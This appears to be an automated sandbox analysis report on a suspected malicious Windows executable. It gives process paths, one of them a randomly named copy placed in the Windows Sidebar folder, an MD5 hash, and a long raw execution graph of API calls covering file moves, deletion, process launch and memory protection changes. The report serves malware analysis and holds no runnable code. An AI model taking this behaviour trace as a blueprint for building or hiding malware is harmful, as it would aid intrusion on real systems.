                                                                                            Start time:17:52:57
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent\Bridgecommon.exe"
                                                                                            Imagebase:0x220000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:56
                                                                                            Start time:17:53:06
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x830000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:57
                                                                                            Start time:17:53:15
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent\Bridgecommon.exe"
                                                                                            Imagebase:0xc80000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:9.4%
                                                                                              Total number of Nodes:1517
                                                                                              Total number of Limit Nodes:41
24773->24856 24774 cbf495 24807 cc8a3e 51 API calls 24774->24807 24777 cbf49d 24808 cbdf1e 24777->24808 24781 cbf4b1 24781->24761 24782 cbf4b5 24781->24782 24783 cbf4be 24782->24783 24858 cc7efb 28 API calls _abort 24782->24858 24859 cbf048 12 API calls ___scrt_uninitialize_crt 24783->24859 24786 cbf4c6 24786->24769 24788 cbeee0 24787->24788 24862 cbf654 IsProcessorFeaturePresent 24788->24862 24790 cbeeec 24863 cc2a5e 24790->24863 24792 cbeef1 24793 cbeef5 24792->24793 24871 cc8977 24792->24871 24793->24758 24796 cbef0c 24796->24758 24799 cc8b04 24798->24799 24800 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24799->24800 24801 cbf408 24800->24801 24801->24769 24802 cc8a91 24801->24802 24803 cc8ac0 24802->24803 24804 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24803->24804 24805 cc8ae9 24804->24805 24805->24773 24806->24774 24807->24777 24964 cb0863 24808->24964 24812 cbdf3d 25013 cbac16 24812->25013 24814 cbdf46 _abort 24815 cbdf59 GetCommandLineW 24814->24815 24816 cbdf68 24815->24816 24817 cbdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24815->24817 25017 cbc5c4 24816->25017 24818 ca4092 _swprintf 51 API calls 24817->24818 24820 cbe04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24818->24820 25028 cbb6dd LoadBitmapW 24820->25028 24823 cbdfe0 25022 cbdbde 24823->25022 24824 cbdf76 OpenFileMappingW 24827 cbdf8f MapViewOfFile 24824->24827 24828 cbdfd6 CloseHandle 24824->24828 24830 cbdfcd UnmapViewOfFile 24827->24830 24831 cbdfa0 __InternalCxxFrameHandler 24827->24831 24828->24817 24830->24828 24834 cbdbde 2 API calls 24831->24834 24837 cbdfbc 24834->24837 24836 cb90b7 8 API calls 24838 cbe0aa DialogBoxParamW 24836->24838 24837->24830 24839 cbe0e4 24838->24839 24840 cbe0f6 Sleep 24839->24840 24841 cbe0fd 24839->24841 24840->24841 24846 cbe10b 24841->24846 25058 cbae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24841->25058 24843 cbe12a DeleteObject 24844 cbe13f DeleteObject 
24843->24844 24845 cbe146 24843->24845 24844->24845 24847 cbe189 24845->24847 24848 cbe177 24845->24848 24846->24843 25055 cbac7c 24847->25055 25059 cbdc3b 6 API calls 24848->25059 24851 cbe17d CloseHandle 24851->24847 24852 cbe1c3 24857 cbf993 GetModuleHandleW 24852->24857 25191 cc7cd5 24853->25191 24856->24771 24857->24781 24858->24783 24859->24786 24860->24761 24862->24790 24875 cc3b07 24863->24875 24867 cc2a7a 24867->24792 24868 cc2a6f 24868->24867 24889 cc3b43 DeleteCriticalSection 24868->24889 24870 cc2a67 24870->24792 24918 ccc05a 24871->24918 24874 cc2a7d 7 API calls 2 library calls 24874->24793 24876 cc3b10 24875->24876 24878 cc3b39 24876->24878 24879 cc2a63 24876->24879 24890 cc3d46 24876->24890 24895 cc3b43 DeleteCriticalSection 24878->24895 24879->24870 24881 cc2b8c 24879->24881 24911 cc3c57 24881->24911 24884 cc2ba1 24884->24868 24886 cc2baf 24887 cc2bbc 24886->24887 24917 cc2bbf 6 API calls ___vcrt_FlsFree 24886->24917 24887->24868 24889->24870 24896 cc3c0d 24890->24896 24893 cc3d7e InitializeCriticalSectionAndSpinCount 24894 cc3d69 24893->24894 24894->24876 24895->24879 24897 cc3c26 24896->24897 24898 cc3c4f 24896->24898 24897->24898 24903 cc3b72 24897->24903 24898->24893 24898->24894 24901 cc3c3b GetProcAddress 24901->24898 24902 cc3c49 24901->24902 24902->24898 24909 cc3b7e ___vcrt_FlsGetValue 24903->24909 24904 cc3bf3 24904->24898 24904->24901 24905 cc3b95 LoadLibraryExW 24906 cc3bfa 24905->24906 24907 cc3bb3 GetLastError 24905->24907 24906->24904 24908 cc3c02 FreeLibrary 24906->24908 24907->24909 24908->24904 24909->24904 24909->24905 24910 cc3bd5 LoadLibraryExW 24909->24910 24910->24906 24910->24909 24912 cc3c0d ___vcrt_FlsGetValue 5 API calls 24911->24912 24913 cc3c71 24912->24913 24914 cc3c8a TlsAlloc 24913->24914 24915 cc2b96 24913->24915 24915->24884 24916 cc3d08 6 API calls ___vcrt_FlsGetValue 24915->24916 24916->24886 24917->24884 24921 ccc077 24918->24921 24922 ccc073 24918->24922 24919 cbfbbc 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24920 cbeefe 24919->24920 24920->24796 24920->24874 24921->24922 24924 cca6a0 24921->24924 24922->24919 24925 cca6ac __FrameHandler3::FrameUnwindToState 24924->24925 24936 ccac31 EnterCriticalSection 24925->24936 24927 cca6b3 24937 ccc528 24927->24937 24929 cca6c2 24935 cca6d1 24929->24935 24950 cca529 29 API calls 24929->24950 24932 cca6e2 _abort 24932->24921 24933 cca6cc 24951 cca5df GetStdHandle GetFileType 24933->24951 24952 cca6ed LeaveCriticalSection _abort 24935->24952 24936->24927 24938 ccc534 __FrameHandler3::FrameUnwindToState 24937->24938 24939 ccc558 24938->24939 24940 ccc541 24938->24940 24953 ccac31 EnterCriticalSection 24939->24953 24961 cc91a8 20 API calls _abort 24940->24961 24943 ccc546 24962 cc9087 26 API calls _abort 24943->24962 24945 ccc590 24963 ccc5b7 LeaveCriticalSection _abort 24945->24963 24946 ccc550 _abort 24946->24929 24947 ccc564 24947->24945 24954 ccc479 24947->24954 24950->24933 24951->24935 24952->24932 24953->24947 24955 ccb136 _abort 20 API calls 24954->24955 24957 ccc48b 24955->24957 24956 ccc498 24958 cc8dcc _free 20 API calls 24956->24958 24957->24956 24959 ccaf0a 11 API calls 24957->24959 24960 ccc4ea 24958->24960 24959->24957 24960->24947 24961->24943 24962->24946 24963->24946 24965 cbec50 24964->24965 24966 cb086d GetModuleHandleW 24965->24966 24967 cb0888 GetProcAddress 24966->24967 24968 cb08e7 24966->24968 24969 cb08b9 GetProcAddress 24967->24969 24970 cb08a1 24967->24970 24971 cb0c14 GetModuleFileNameW 24968->24971 25069 cc75fb 42 API calls 2 library calls 24968->25069 24972 cb08cb 24969->24972 24970->24969 24980 cb0c32 24971->24980 24972->24968 24974 cb0b54 24974->24971 24975 cb0b5f GetModuleFileNameW CreateFileW 24974->24975 24976 cb0c08 CloseHandle 24975->24976 24977 cb0b8f SetFilePointer 24975->24977 24976->24971 24977->24976 24978 cb0b9d ReadFile 24977->24978 24978->24976 24982 cb0bbb 24978->24982 24983 cb0c94 GetFileAttributesW 24980->24983 24985 
cb0c5d CompareStringW 24980->24985 24986 cb0cac 24980->24986 25060 cab146 24980->25060 25063 cb081b 24980->25063 24982->24976 24984 cb081b 2 API calls 24982->24984 24983->24980 24983->24986 24984->24982 24985->24980 24987 cb0cb7 24986->24987 24990 cb0cec 24986->24990 24989 cb0cd0 GetFileAttributesW 24987->24989 24991 cb0ce8 24987->24991 24988 cb0dfb 25012 cba64d GetCurrentDirectoryW 24988->25012 24989->24987 24989->24991 24990->24988 24992 cab146 GetVersionExW 24990->24992 24991->24990 24993 cb0d06 24992->24993 24994 cb0d0d 24993->24994 24995 cb0d73 24993->24995 24997 cb081b 2 API calls 24994->24997 24996 ca4092 _swprintf 51 API calls 24995->24996 24998 cb0d9b AllocConsole 24996->24998 24999 cb0d17 24997->24999 25000 cb0da8 GetCurrentProcessId AttachConsole 24998->25000 25001 cb0df3 ExitProcess 24998->25001 25002 cb081b 2 API calls 24999->25002 25070 cc3e13 25000->25070 25004 cb0d21 25002->25004 25005 cae617 53 API calls 25004->25005 25007 cb0d3c 25005->25007 25006 cb0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25006->25001 25008 ca4092 _swprintf 51 API calls 25007->25008 25009 cb0d4f 25008->25009 25010 cae617 53 API calls 25009->25010 25011 cb0d5e 25010->25011 25011->25001 25012->24812 25014 cb081b 2 API calls 25013->25014 25015 cbac2a OleInitialize 25014->25015 25016 cbac4d GdiplusStartup SHGetMalloc 25015->25016 25016->24814 25020 cbc5ce 25017->25020 25018 cbc6e4 25018->24823 25018->24824 25019 cb1fac CharUpperW 25019->25020 25020->25018 25020->25019 25072 caf3fa 82 API calls 2 library calls 25020->25072 25023 cbec50 25022->25023 25024 cbdbeb SetEnvironmentVariableW 25023->25024 25026 cbdc0e 25024->25026 25025 cbdc36 25025->24817 25026->25025 25027 cbdc2a SetEnvironmentVariableW 25026->25027 25027->25025 25029 cbb70b GetObjectW 25028->25029 25030 cbb6fe 25028->25030 25032 cbb71a 25029->25032 25073 cba6c2 FindResourceW 25030->25073 25033 cba5c6 4 API calls 25032->25033 25035 cbb72d 25033->25035 25036 cbb770 25035->25036 25037 cbb74c 25035->25037 25038 cba6c2 
13 API calls 25035->25038 25047 cada42 25036->25047 25089 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25037->25089 25040 cbb73d 25038->25040 25040->25037 25042 cbb743 DeleteObject 25040->25042 25041 cbb754 25090 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25041->25090 25042->25037 25044 cbb75d 25091 cba80c 8 API calls 25044->25091 25046 cbb764 DeleteObject 25046->25036 25100 cada67 25047->25100 25052 cb90b7 25053 cbeb38 8 API calls 25052->25053 25054 cb90d6 25053->25054 25054->24836 25056 cbacab GdiplusShutdown CoUninitialize 25055->25056 25056->24852 25058->24846 25059->24851 25061 cab15a GetVersionExW 25060->25061 25062 cab196 25060->25062 25061->25062 25062->24980 25064 cbec50 25063->25064 25065 cb0828 GetSystemDirectoryW 25064->25065 25066 cb085e 25065->25066 25067 cb0840 25065->25067 25066->24980 25068 cb0851 LoadLibraryW 25067->25068 25068->25066 25069->24974 25071 cc3e1b 25070->25071 25071->25006 25071->25071 25072->25020 25074 cba7d3 25073->25074 25075 cba6e5 SizeofResource 25073->25075 25074->25029 25074->25032 25075->25074 25076 cba6fc LoadResource 25075->25076 25076->25074 25077 cba711 LockResource 25076->25077 25077->25074 25078 cba722 GlobalAlloc 25077->25078 25078->25074 25079 cba73d GlobalLock 25078->25079 25080 cba7cc GlobalFree 25079->25080 25081 cba74c __InternalCxxFrameHandler 25079->25081 25080->25074 25082 cba754 CreateStreamOnHGlobal 25081->25082 25083 cba76c 25082->25083 25084 cba7c5 GlobalUnlock 25082->25084 25092 cba626 GdipAlloc 25083->25092 25084->25080 25087 cba79a GdipCreateHBITMAPFromBitmap 25088 cba7b0 25087->25088 25088->25084 25089->25041 25090->25044 25091->25046 25093 cba638 25092->25093 25094 cba645 25092->25094 25096 cba3b9 25093->25096 25094->25084 25094->25087 25094->25088 25097 cba3da GdipCreateBitmapFromStreamICM 25096->25097 25098 cba3e1 GdipCreateBitmapFromStream 25096->25098 25099 cba3e6 25097->25099 25098->25099 25099->25094 25101 cada75 __EH_prolog 25100->25101 25102 cadaa4 GetModuleFileNameW 25101->25102 
25103 cadad5 25101->25103 25104 cadabe 25102->25104 25146 ca98e0 25103->25146 25104->25103 25106 cadb31 25157 cc6310 25106->25157 25107 ca959a 80 API calls 25110 cada4e 25107->25110 25109 cae261 78 API calls 25112 cadb05 25109->25112 25144 cae29e GetModuleHandleW FindResourceW 25110->25144 25111 cadb44 25113 cc6310 26 API calls 25111->25113 25112->25106 25112->25109 25124 cadd4a 25112->25124 25121 cadb56 ___vcrt_FlsGetValue 25113->25121 25114 cadc85 25114->25124 25177 ca9d70 81 API calls 25114->25177 25116 ca9e80 79 API calls 25116->25121 25118 cadc9f ___std_exception_copy 25119 ca9bd0 82 API calls 25118->25119 25118->25124 25122 cadcc8 ___std_exception_copy 25119->25122 25121->25114 25121->25116 25121->25124 25171 ca9bd0 25121->25171 25176 ca9d70 81 API calls 25121->25176 25122->25124 25141 cadcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 25122->25141 25178 cb1b84 MultiByteToWideChar 25122->25178 25124->25107 25125 cae159 25129 cae1de 25125->25129 25184 cc8cce 26 API calls 2 library calls 25125->25184 25127 cae16e 25185 cc7625 26 API calls 2 library calls 25127->25185 25130 cae214 25129->25130 25134 cae261 78 API calls 25129->25134 25135 cc6310 26 API calls 25130->25135 25132 cae1c6 25186 cae27c 78 API calls 25132->25186 25134->25129 25136 cae22d 25135->25136 25137 cc6310 26 API calls 25136->25137 25137->25124 25139 cb1da7 WideCharToMultiByte 25139->25141 25141->25124 25141->25125 25141->25139 25179 cae5b1 50 API calls __vsnprintf 25141->25179 25180 cc6159 26 API calls 3 library calls 25141->25180 25181 cc8cce 26 API calls 2 library calls 25141->25181 25182 cc7625 26 API calls 2 library calls 25141->25182 25183 cae27c 78 API calls 25141->25183 25145 cada55 25144->25145 25145->25052 25147 ca98ea 25146->25147 25148 ca994b CreateFileW 25147->25148 25149 ca996c GetLastError 25148->25149 25153 ca99bb 25148->25153 25150 cabb03 GetCurrentDirectoryW 25149->25150 25151 ca998c 25150->25151 25152 ca9990 CreateFileW GetLastError 25151->25152 25151->25153 25152->25153 
25155 ca99b5 25152->25155 25154 ca99ff 25153->25154 25156 ca99e5 SetFileTime 25153->25156 25154->25112 25155->25153 25156->25154 25158 cc6349 25157->25158 25159 cc634d 25158->25159 25170 cc6375 25158->25170 25187 cc91a8 20 API calls _abort 25159->25187 25161 cc6352 25188 cc9087 26 API calls _abort 25161->25188 25163 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25165 cc66a6 25163->25165 25164 cc635d 25166 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25164->25166 25165->25111 25168 cc6369 25166->25168 25168->25111 25169 cc6699 25169->25163 25170->25169 25189 cc6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25170->25189 25172 ca9bdc 25171->25172 25174 ca9be3 25171->25174 25172->25121 25174->25172 25175 ca9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25174->25175 25190 ca6d1a 77 API calls 25174->25190 25175->25174 25176->25121 25177->25118 25178->25141 25179->25141 25180->25141 25181->25141 25182->25141 25183->25141 25184->25127 25185->25132 25186->25129 25187->25161 25188->25164 25189->25170 25190->25174 25192 cc7ce1 _abort 25191->25192 25193 cc7ce8 25192->25193 25194 cc7cfa 25192->25194 25227 cc7e2f GetModuleHandleW 25193->25227 25215 ccac31 EnterCriticalSection 25194->25215 25197 cc7ced 25197->25194 25228 cc7e73 GetModuleHandleExW 25197->25228 25198 cc7d9f 25216 cc7ddf 25198->25216 25202 cc7d76 25207 cc7d8e 25202->25207 25212 cc8a91 _abort 5 API calls 25202->25212 25204 cc7d01 25204->25198 25204->25202 25236 cc87e0 20 API calls _abort 25204->25236 25205 cc7dbc 25219 cc7dee 25205->25219 25206 cc7de8 25237 cd2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25206->25237 25208 cc8a91 _abort 5 API calls 25207->25208 25208->25198 25212->25207 25215->25204 25238 ccac81 LeaveCriticalSection 25216->25238 25218 cc7db8 25218->25205 25218->25206 25239 ccb076 25219->25239 25222 cc7e1c 25225 cc7e73 _abort 8 API calls 25222->25225 25223 cc7dfc GetPEB 
25223->25222 25224 cc7e0c GetCurrentProcess TerminateProcess 25223->25224 25224->25222 25226 cc7e24 ExitProcess 25225->25226 25227->25197 25229 cc7e9d GetProcAddress 25228->25229 25230 cc7ec0 25228->25230 25234 cc7eb2 25229->25234 25231 cc7ecf 25230->25231 25232 cc7ec6 FreeLibrary 25230->25232 25233 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25231->25233 25232->25231 25235 cc7cf9 25233->25235 25234->25230 25235->25194 25236->25202 25238->25218 25240 ccb09b 25239->25240 25244 ccb091 25239->25244 25241 ccac98 _abort 5 API calls 25240->25241 25241->25244 25242 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25243 cc7df8 25242->25243 25243->25222 25243->25223 25244->25242 25420 cbb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23425 cbe44b 23426 cbe3f4 23425->23426 23428 cbe85d 23426->23428 23454 cbe5bb 23428->23454 23430 cbe86d 23431 cbe8ca 23430->23431 23442 cbe8ee 23430->23442 23432 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23431->23432 23433 cbe8d5 RaiseException 23432->23433 23434 cbeac3 23433->23434 23434->23426 23435 cbe966 LoadLibraryExA 23436 cbe979 GetLastError 23435->23436 23437 cbe9c7 23435->23437 23438 cbe98c 23436->23438 23439 cbe9a2 23436->23439 23440 cbe9d9 23437->23440 23443 cbe9d2 FreeLibrary 23437->23443 23438->23437 23438->23439 23444 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23439->23444 23441 cbea37 GetProcAddress 23440->23441 23450 cbea95 23440->23450 23445 cbea47 GetLastError 23441->23445 23441->23450 23442->23435 23442->23437 23442->23440 23442->23450 23443->23440 23446 cbe9ad RaiseException 23444->23446 23447 cbea5a 23445->23447 23446->23434 23449 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23447->23449 23447->23450 23451 cbea7b RaiseException 23449->23451 23463 cbe7fb 23450->23463 23452 cbe5bb ___delayLoadHelper2@8 6 API calls 23451->23452 23453 cbea92 23452->23453 23453->23450 23455 cbe5ed 23454->23455 23456 cbe5c7 23454->23456 23455->23430 23471 cbe664 
23456->23471 23458 cbe5cc 23459 cbe5e8 23458->23459 23474 cbe78d 23458->23474 23479 cbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23459->23479 23462 cbe836 23462->23430 23464 cbe82f 23463->23464 23465 cbe80d 23463->23465 23464->23434 23466 cbe664 DloadReleaseSectionWriteAccess 3 API calls 23465->23466 23467 cbe812 23466->23467 23468 cbe82a 23467->23468 23470 cbe78d DloadProtectSection 3 API calls 23467->23470 23482 cbe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23468->23482 23470->23468 23480 cbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23471->23480 23473 cbe669 23473->23458 23477 cbe7a2 DloadProtectSection 23474->23477 23475 cbe7a8 23475->23459 23476 cbe7dd VirtualProtect 23476->23475 23477->23475 23477->23476 23481 cbe6a3 VirtualQuery GetSystemInfo 23477->23481 23479->23462 23480->23473 23481->23476 23482->23464 25389 cba440 GdipCloneImage GdipAlloc 25442 cc3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25462 cd1f40 CloseHandle 23619 cbcd58 23621 cbce22 23619->23621 23626 cbcd7b 23619->23626 23630 cbc793 _wcslen _wcsrchr 23621->23630 23647 cbd78f 23621->23647 23623 cbd40a 23624 cb1fbb CompareStringW 23624->23626 23626->23621 23626->23624 23627 cbca67 SetWindowTextW 23627->23630 23630->23623 23630->23627 23633 cbc855 SetFileAttributesW 23630->23633 23638 cbcc31 GetDlgItem SetWindowTextW SendMessageW 23630->23638 23642 cbcc71 SendMessageW 23630->23642 23646 cb1fbb CompareStringW 23630->23646 23671 cbb314 23630->23671 23675 cba64d GetCurrentDirectoryW 23630->23675 23677 caa5d1 6 API calls 23630->23677 23678 caa55a FindClose 23630->23678 23679 cbb48e 76 API calls 2 library calls 23630->23679 23680 cc3e3e 23630->23680 23635 cbc90f GetFileAttributesW 23633->23635 23645 cbc86f _abort _wcslen 23633->23645 23635->23630 23637 cbc921 DeleteFileW 23635->23637 23637->23630 23639 cbc932 23637->23639 23638->23630 23640 ca4092 _swprintf 51 API calls 23639->23640 23641 cbc952 GetFileAttributesW 
23640->23641 23641->23639 23643 cbc967 MoveFileW 23641->23643 23642->23630 23643->23630 23644 cbc97f MoveFileExW 23643->23644 23644->23630 23645->23630 23645->23635 23676 cab991 51 API calls 2 library calls 23645->23676 23646->23630 23649 cbd799 _abort _wcslen 23647->23649 23648 cbd9c0 23650 cbd9e7 23648->23650 23653 cbd9de ShowWindow 23648->23653 23649->23648 23649->23650 23654 cbd8a5 23649->23654 23696 cb1fbb CompareStringW 23649->23696 23650->23630 23653->23650 23693 caa231 23654->23693 23656 cbd8d9 ShellExecuteExW 23656->23650 23663 cbd8ec 23656->23663 23658 cbd8d1 23658->23656 23659 cbd925 23698 cbdc3b 6 API calls 23659->23698 23660 cbd97b CloseHandle 23661 cbd989 23660->23661 23662 cbd994 23660->23662 23699 cb1fbb CompareStringW 23661->23699 23662->23648 23663->23659 23663->23660 23665 cbd91b ShowWindow 23663->23665 23665->23659 23667 cbd93d 23667->23660 23668 cbd950 GetExitCodeProcess 23667->23668 23668->23660 23669 cbd963 23668->23669 23669->23660 23672 cbb31e 23671->23672 23673 cbb3f0 ExpandEnvironmentStringsW 23672->23673 23674 cbb40d 23672->23674 23673->23674 23674->23630 23675->23630 23676->23645 23677->23630 23678->23630 23679->23630 23681 cc8e54 23680->23681 23682 cc8e6c 23681->23682 23683 cc8e61 23681->23683 23685 cc8e74 23682->23685 23691 cc8e7d _abort 23682->23691 23714 cc8e06 23683->23714 23686 cc8dcc _free 20 API calls 23685->23686 23690 cc8e69 23686->23690 23687 cc8ea7 HeapReAlloc 23687->23690 23687->23691 23688 cc8e82 23721 cc91a8 20 API calls _abort 23688->23721 23690->23630 23691->23687 23691->23688 23722 cc7a5e 7 API calls 2 library calls 23691->23722 23700 caa243 23693->23700 23696->23654 23697 cab6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23697->23658 23698->23667 23699->23662 23708 cbec50 23700->23708 23703 caa23a 23703->23656 23703->23697 23704 caa261 23710 cabb03 23704->23710 23706 caa275 23706->23703 23707 caa279 GetFileAttributesW 23706->23707 23707->23703 23709 caa250 GetFileAttributesW 23708->23709 23709->23703 
23709->23704 23711 cabb10 _wcslen 23710->23711 23712 cabbb8 GetCurrentDirectoryW 23711->23712 23713 cabb39 _wcslen 23711->23713 23712->23713 23713->23706 23715 cc8e44 23714->23715 23716 cc8e14 _abort 23714->23716 23724 cc91a8 20 API calls _abort 23715->23724 23716->23715 23717 cc8e2f RtlAllocateHeap 23716->23717 23723 cc7a5e 7 API calls 2 library calls 23716->23723 23717->23716 23719 cc8e42 23717->23719 23719->23690 23721->23690 23722->23691 23723->23716 23724->23719 23732 ccc051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25391 cbe455 14 API calls ___delayLoadHelper2@8 25392 cbc793 107 API calls 4 library calls 25463 cc7f6e 52 API calls 2 library calls 25444 cc8268 55 API calls _free 24661 ca9f7a 24662 ca9f88 24661->24662 24663 ca9f8f 24661->24663 24664 ca9f9c GetStdHandle 24663->24664 24666 ca9fab 24663->24666 24664->24666 24665 caa003 WriteFile 24665->24666 24666->24662 24666->24665 24667 ca9fcf 24666->24667 24668 ca9fd4 WriteFile 24666->24668 24670 caa095 24666->24670 24672 ca6baa 78 API calls 24666->24672 24667->24666 24667->24668 24668->24666 24668->24667 24673 ca6e98 77 API calls 24670->24673 24672->24666 24673->24662 25464 ca1f72 128 API calls __EH_prolog 25394 cba070 10 API calls 25445 cbb270 99 API calls 24722 ca9a74 24726 ca9a7e 24722->24726 24723 ca9ab1 24724 ca9b9d SetFilePointer 24724->24723 24725 ca9bb6 GetLastError 24724->24725 24725->24723 24726->24723 24726->24724 24727 ca9b79 24726->24727 24728 ca981a 79 API calls 24726->24728 24727->24724 24728->24727 25396 ca1075 84 API calls 25397 cba400 GdipDisposeImage GdipFree 25446 cbd600 70 API calls 25398 cc6000 QueryPerformanceFrequency QueryPerformanceCounter 25427 cc2900 6 API calls 4 library calls 25447 ccf200 51 API calls 25466 cca700 21 API calls 25468 ca1710 86 API calls 25430 cbad10 73 API calls 25432 ccb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25448 cbc220 93 API calls _swprintf 25404 ccf421 21 API calls __vswprintf_c_l 25405 ca1025 29 API 
calls 25433 cbf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25471 cbff30 LocalFree 25248 ccbb30 25249 ccbb39 25248->25249 25250 ccbb42 25248->25250 25252 ccba27 25249->25252 25253 cc97e5 _abort 38 API calls 25252->25253 25254 ccba34 25253->25254 25272 ccbb4e 25254->25272 25256 ccba3c 25281 ccb7bb 25256->25281 25259 ccba53 25259->25250 25260 cc8e06 __vswprintf_c_l 21 API calls 25261 ccba64 25260->25261 25262 ccba96 25261->25262 25288 ccbbf0 25261->25288 25265 cc8dcc _free 20 API calls 25262->25265 25265->25259 25266 ccba91 25298 cc91a8 20 API calls _abort 25266->25298 25268 ccbada 25268->25262 25299 ccb691 26 API calls 25268->25299 25269 ccbaae 25269->25268 25270 cc8dcc _free 20 API calls 25269->25270 25270->25268 25273 ccbb5a __FrameHandler3::FrameUnwindToState 25272->25273 25274 cc97e5 _abort 38 API calls 25273->25274 25279 ccbb64 25274->25279 25276 ccbbe8 _abort 25276->25256 25279->25276 25280 cc8dcc _free 20 API calls 25279->25280 25300 cc8d24 38 API calls _abort 25279->25300 25301 ccac31 EnterCriticalSection 25279->25301 25302 ccbbdf LeaveCriticalSection _abort 25279->25302 25280->25279 25282 cc4636 __fassign 38 API calls 25281->25282 25283 ccb7cd 25282->25283 25284 ccb7dc GetOEMCP 25283->25284 25285 ccb7ee 25283->25285 25286 ccb805 25284->25286 25285->25286 25287 ccb7f3 GetACP 25285->25287 25286->25259 25286->25260 25287->25286 25289 ccb7bb 40 API calls 25288->25289 25290 ccbc0f 25289->25290 25291 ccbc16 25290->25291 25293 ccbc85 _abort 25290->25293 25295 ccbc60 IsValidCodePage 25290->25295 25292 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25291->25292 25294 ccba89 25292->25294 25303 ccb893 GetCPInfo 25293->25303 25294->25266 25294->25269 25295->25291 25296 ccbc72 GetCPInfo 25295->25296 25296->25291 25296->25293 25298->25262 25299->25262 25301->25279 25302->25279 25307 ccb8cd 25303->25307 25312 ccb977 25303->25312 25306 cbfbbc 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25309 ccba23 25306->25309 25313 ccc988 25307->25313 25309->25291 25311 ccab78 __vswprintf_c_l 43 API calls 25311->25312 25312->25306 25314 cc4636 __fassign 38 API calls 25313->25314 25315 ccc9a8 MultiByteToWideChar 25314->25315 25319 ccc9e6 25315->25319 25325 ccca7e 25315->25325 25317 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25321 ccb92e 25317->25321 25318 ccca07 _abort __vsnwprintf_l 25322 ccca78 25318->25322 25324 ccca4c MultiByteToWideChar 25318->25324 25319->25318 25320 cc8e06 __vswprintf_c_l 21 API calls 25319->25320 25320->25318 25327 ccab78 25321->25327 25332 ccabc3 20 API calls _free 25322->25332 25324->25322 25326 ccca68 GetStringTypeW 25324->25326 25325->25317 25326->25322 25328 cc4636 __fassign 38 API calls 25327->25328 25329 ccab8b 25328->25329 25333 cca95b 25329->25333 25332->25325 25334 cca976 __vswprintf_c_l 25333->25334 25335 cca99c MultiByteToWideChar 25334->25335 25336 cca9c6 25335->25336 25337 ccab50 25335->25337 25341 cc8e06 __vswprintf_c_l 21 API calls 25336->25341 25343 cca9e7 __vsnwprintf_l 25336->25343 25338 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25337->25338 25339 ccab63 25338->25339 25339->25311 25340 ccaa30 MultiByteToWideChar 25342 ccaa49 25340->25342 25354 ccaa9c 25340->25354 25341->25343 25360 ccaf6c 25342->25360 25343->25340 25343->25354 25347 ccaaab 25349 cc8e06 __vswprintf_c_l 21 API calls 25347->25349 25355 ccaacc 